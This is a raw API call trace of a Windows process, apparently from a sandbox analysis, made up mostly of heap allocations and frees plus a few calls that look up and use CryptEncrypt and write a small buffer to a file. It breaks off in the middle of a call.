[0223.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0223.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0223.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0223.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0223.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0223.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0223.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0223.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0223.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0223.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0223.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0223.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0223.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0223.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0223.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0223.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0223.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0223.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0223.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0223.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0223.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0223.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0223.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0223.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0223.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0223.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0223.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0223.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0223.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0223.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc38 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabaa0 [0223.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba70 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc98 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb78 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0223.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0223.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0223.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0223.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc98 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc50 [0223.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabba8 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69790 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba88 [0223.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0223.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0223.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc68 [0223.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0223.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba40 [0223.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0223.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0223.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcc8 [0223.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbf0 [0223.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0223.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabae8 [0223.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0223.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71d88 [0223.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0223.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0223.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0223.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0223.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb48 [0223.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0223.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcb0 [0223.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0223.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7910 [0223.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0223.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbd8 [0223.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0223.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcc8 [0223.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba58 [0223.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0223.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0223.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69850 [0223.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabab8 [0223.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0223.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0223.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0223.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69850 | out: hHeap=0x2af0000) returned 1 [0223.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0223.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0223.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0223.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0223.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb00 [0223.373] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb18 [0223.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0223.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0223.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba58 [0223.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0223.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbf0 [0223.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0223.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcc8 [0223.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0223.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0223.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb18 [0223.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0223.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0223.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba58 [0223.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0223.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0223.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabab8 [0223.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0223.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0223.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0223.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0223.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabae8 [0223.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0223.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0223.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc08 [0223.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0223.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0223.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0223.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb18 [0223.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0223.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0223.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb78 [0223.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0223.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0223.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0223.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0223.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb90 [0223.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0223.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0223.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb78 [0223.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0223.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0223.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0223.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcc8 [0223.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0223.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0223.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabab8 [0223.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0223.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0223.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0223.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb90 [0223.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0223.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0223.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbf0 [0223.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0223.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0223.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0223.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0223.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb78 [0223.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0223.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0223.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aabbf0 [0223.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabbf0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0223.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0223.377] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a781b0 [0223.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0223.377] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71c28*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71c28*, pdwDataLen=0x8cef60*=0x8) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0223.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0223.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.378] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0223.378] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0223.378] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0223.378] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0223.378] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.378] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.378] WriteFile (in: hFile=0x4b0, lpBuffer=0x2a71ca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71ca8*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0223.379] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0223.380] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0223.380] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.380] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 